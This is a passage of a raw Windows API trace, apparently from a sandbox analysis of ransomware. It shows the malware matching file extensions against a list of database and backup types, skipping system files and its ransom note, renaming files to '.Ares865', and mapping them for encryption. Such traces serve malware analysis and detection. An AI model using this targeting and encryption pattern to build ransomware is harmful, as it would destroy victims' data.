lpString2="sql") returned -1 [0086.529] lstrlenW (lpString="sqlite") returned 6 [0086.529] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.529] lstrlenW (lpString="sqlite3") returned 7 [0086.529] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.529] lstrlenW (lpString="sqlitedb") returned 8 [0086.529] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.529] lstrlenW (lpString="xml") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.529] lstrlenW (lpString="$er") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.529] lstrlenW (lpString="4dd") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.529] lstrlenW (lpString="4dl") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.529] lstrlenW (lpString="^^^") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.529] lstrlenW (lpString="abs") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.529] lstrlenW (lpString="abx") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.529] lstrlenW (lpString="accdb") returned 5 [0086.529] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.529] lstrlenW (lpString="accdc") returned 5 [0086.529] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.529] lstrlenW (lpString="accde") returned 5 [0086.529] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.530] lstrlenW (lpString="accdr") returned 5 [0086.530] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.530] lstrlenW (lpString="accdt") returned 5 [0086.530] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.530] lstrlenW (lpString="accdw") returned 5 [0086.530] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.530] lstrlenW (lpString="accft") returned 5 [0086.530] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.530] lstrlenW (lpString="adb") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.530] lstrlenW (lpString="adb") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.530] lstrlenW (lpString="ade") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.530] lstrlenW (lpString="adf") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.530] lstrlenW (lpString="adn") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.530] lstrlenW (lpString="adp") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.530] lstrlenW (lpString="alf") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.530] lstrlenW (lpString="ask") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.530] lstrlenW (lpString="btr") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.530] lstrlenW (lpString="cat") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.530] lstrlenW (lpString="cdb") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.530] lstrlenW (lpString="ckp") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.530] lstrlenW (lpString="cma") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.530] lstrlenW (lpString="cpd") returned 3 [0086.530] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.530] lstrlenW (lpString="dacpac") returned 6 [0086.531] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.531] lstrlenW (lpString="dad") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.531] lstrlenW (lpString="dadiagrams") returned 10 [0086.531] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.531] lstrlenW (lpString="daschema") returned 8 [0086.531] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.531] lstrlenW (lpString="db-journal") returned 10 [0086.531] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.531] lstrlenW (lpString="db-shm") returned 6 [0086.531] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.531] lstrlenW (lpString="db-wal") returned 6 [0086.531] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.531] lstrlenW (lpString="dbc") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.531] lstrlenW (lpString="dbs") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.531] lstrlenW (lpString="dbt") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.531] lstrlenW (lpString="dbv") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.531] lstrlenW (lpString="dbx") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.531] lstrlenW (lpString="dcb") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.531] lstrlenW (lpString="dct") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.531] lstrlenW (lpString="dcx") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.531] lstrlenW (lpString="ddl") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.531] lstrlenW (lpString="dlis") returned 4 [0086.531] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.531] lstrlenW (lpString="dp1") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.531] lstrlenW (lpString="dqy") returned 3 [0086.531] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.532] lstrlenW (lpString="dsk") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.532] lstrlenW (lpString="dsn") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.532] lstrlenW (lpString="dtsx") returned 4 [0086.532] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.532] lstrlenW (lpString="dxl") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.532] lstrlenW (lpString="eco") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.532] lstrlenW (lpString="ecx") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.532] lstrlenW (lpString="edb") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.532] lstrlenW (lpString="epim") returned 4 [0086.532] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.532] lstrlenW (lpString="fcd") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.532] lstrlenW (lpString="fdb") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.532] lstrlenW (lpString="fic") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.532] lstrlenW (lpString="flexolibrary") returned 12 [0086.532] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.532] lstrlenW (lpString="fm5") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.532] lstrlenW (lpString="fmp") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.532] lstrlenW (lpString="fmp12") returned 5 [0086.532] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.532] lstrlenW (lpString="fmpsl") returned 5 [0086.532] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.532] lstrlenW (lpString="fol") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.532] lstrlenW (lpString="fp3") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.532] lstrlenW (lpString="fp4") returned 3 [0086.532] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.533] lstrlenW (lpString="fp5") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.533] lstrlenW (lpString="fp7") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.533] lstrlenW (lpString="fpt") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.533] lstrlenW (lpString="frm") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.533] lstrlenW (lpString="gdb") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.533] lstrlenW (lpString="gdb") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.533] lstrlenW (lpString="grdb") returned 4 [0086.533] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.533] lstrlenW (lpString="gwi") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.533] lstrlenW (lpString="hdb") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.533] lstrlenW (lpString="his") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.533] lstrlenW (lpString="ib") returned 2 [0086.533] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.533] lstrlenW (lpString="idb") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.533] lstrlenW (lpString="ihx") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.533] lstrlenW (lpString="itdb") returned 4 [0086.533] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.533] lstrlenW (lpString="itw") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.533] lstrlenW (lpString="jet") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.533] lstrlenW (lpString="jtx") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.533] lstrlenW (lpString="kdb") returned 3 [0086.533] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.533] lstrlenW (lpString="kexi") returned 4 [0086.534] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.534] lstrlenW (lpString="kexic") returned 5 [0086.534] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.534] lstrlenW (lpString="kexis") returned 5 [0086.534] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.534] lstrlenW (lpString="lgc") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.534] lstrlenW (lpString="lwx") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.534] lstrlenW (lpString="maf") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.534] lstrlenW (lpString="maq") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.534] lstrlenW (lpString="mar") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.534] lstrlenW (lpString="marshal") returned 7 [0086.534] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.534] lstrlenW (lpString="mas") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.534] lstrlenW (lpString="mav") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.534] lstrlenW (lpString="maw") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.534] lstrlenW (lpString="mdbhtml") returned 7 [0086.534] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.534] lstrlenW (lpString="mdn") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.534] lstrlenW (lpString="mdt") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.534] lstrlenW (lpString="mfd") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.534] lstrlenW (lpString="mpd") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.534] lstrlenW (lpString="mrg") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.534] lstrlenW (lpString="mud") returned 3 [0086.534] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.535] lstrlenW (lpString="mwb") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.535] lstrlenW (lpString="myd") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.535] lstrlenW (lpString="ndf") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.535] lstrlenW (lpString="nnt") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.535] lstrlenW (lpString="nrmlib") returned 6 [0086.535] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.535] lstrlenW (lpString="ns2") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.535] lstrlenW (lpString="ns3") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.535] lstrlenW (lpString="ns4") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.535] lstrlenW (lpString="nsf") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.535] lstrlenW (lpString="nv") returned 2 [0086.535] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.535] lstrlenW (lpString="nv2") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.535] lstrlenW (lpString="nwdb") returned 4 [0086.535] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.535] lstrlenW (lpString="nyf") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.535] lstrlenW (lpString="odb") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.535] lstrlenW (lpString="odb") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.535] lstrlenW (lpString="oqy") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.535] lstrlenW (lpString="ora") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.535] lstrlenW (lpString="orx") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.535] lstrlenW (lpString="owc") returned 3 [0086.535] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.536] lstrlenW (lpString="p96") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.536] lstrlenW (lpString="p97") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.536] lstrlenW (lpString="pan") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.536] lstrlenW (lpString="pdb") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.536] lstrlenW (lpString="pdm") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.536] lstrlenW (lpString="pnz") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.536] lstrlenW (lpString="qry") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.536] lstrlenW (lpString="qvd") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.536] lstrlenW (lpString="rbf") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.536] lstrlenW (lpString="rctd") returned 4 [0086.536] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.536] lstrlenW (lpString="rod") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.536] lstrlenW (lpString="rodx") returned 4 [0086.536] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.536] lstrlenW (lpString="rpd") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.536] lstrlenW (lpString="rsd") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.536] lstrlenW (lpString="sas7bdat") returned 8 [0086.536] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.536] lstrlenW (lpString="sbf") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.536] lstrlenW (lpString="scx") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.536] lstrlenW (lpString="sdb") returned 3 [0086.536] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.536] lstrlenW (lpString="sdc") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.537] lstrlenW (lpString="sdf") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.537] lstrlenW (lpString="sis") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.537] lstrlenW (lpString="spq") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.537] lstrlenW (lpString="te") returned 2 [0086.537] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.537] lstrlenW (lpString="teacher") returned 7 [0086.537] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.537] lstrlenW (lpString="tmd") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.537] lstrlenW (lpString="tps") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.537] lstrlenW (lpString="trc") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.537] lstrlenW (lpString="trc") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.537] lstrlenW (lpString="trm") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.537] lstrlenW (lpString="udb") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.537] lstrlenW (lpString="udl") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.537] lstrlenW (lpString="usr") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.537] lstrlenW (lpString="v12") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.537] lstrlenW (lpString="vis") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.537] lstrlenW (lpString="vpd") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.537] lstrlenW (lpString="vvv") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.537] lstrlenW (lpString="wdb") returned 3 [0086.537] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.537] lstrlenW (lpString="wmdb") returned 4 [0086.538] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.538] lstrlenW (lpString="wrk") returned 3 [0086.538] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.538] lstrlenW (lpString="xdb") returned 3 [0086.538] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.538] lstrlenW (lpString="xld") returned 3 [0086.538] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.538] lstrlenW (lpString="xmlff") returned 5 [0086.538] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.Ares865") returned 79 [0086.538] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.539] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=275808) returned 1 [0086.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.540] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.541] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x43860, lpName=0x0) returned 0x15c [0086.543] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43860) returned 0x420000 [0086.674] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.675] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.678] CloseHandle (hObject=0x15c) returned 1 [0086.678] CloseHandle (hObject=0x118) returned 1 [0086.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".") returned 1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="..") returned 1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="temp") returned -1 [0086.679] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.680] lstrlenW (lpString="PUB6INTL.DLL.trx_dll") returned 20 [0086.680] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0086.680] lstrcpyW (in: lpString1=0x2cce468, lpString2="PUB6INTL.DLL.trx_dll" | out: lpString1="PUB6INTL.DLL.trx_dll") returned="PUB6INTL.DLL.trx_dll" [0086.680] lstrlenW (lpString="PUB6INTL.DLL.trx_dll") returned 20 [0086.680] lstrlenW (lpString="Ares865") returned 7 [0086.680] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.680] lstrlenW (lpString=".dll") returned 4 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.680] lstrlenW (lpString=".lnk") returned 4 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.680] lstrlenW (lpString=".ini") returned 4 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.680] lstrlenW (lpString=".sys") returned 4 [0086.680] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.680] lstrlenW (lpString="PUB6INTL.DLL.trx_dll") returned 20 [0086.680] lstrlenW (lpString="bak") returned 3 [0086.680] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.680] lstrlenW (lpString="ba_") returned 3 [0086.680] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.680] lstrlenW (lpString="dbb") returned 3 [0086.680] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.680] lstrlenW (lpString="vmdk") returned 4 [0086.680] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.680] lstrlenW (lpString="rar") returned 3 [0086.680] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.680] lstrlenW 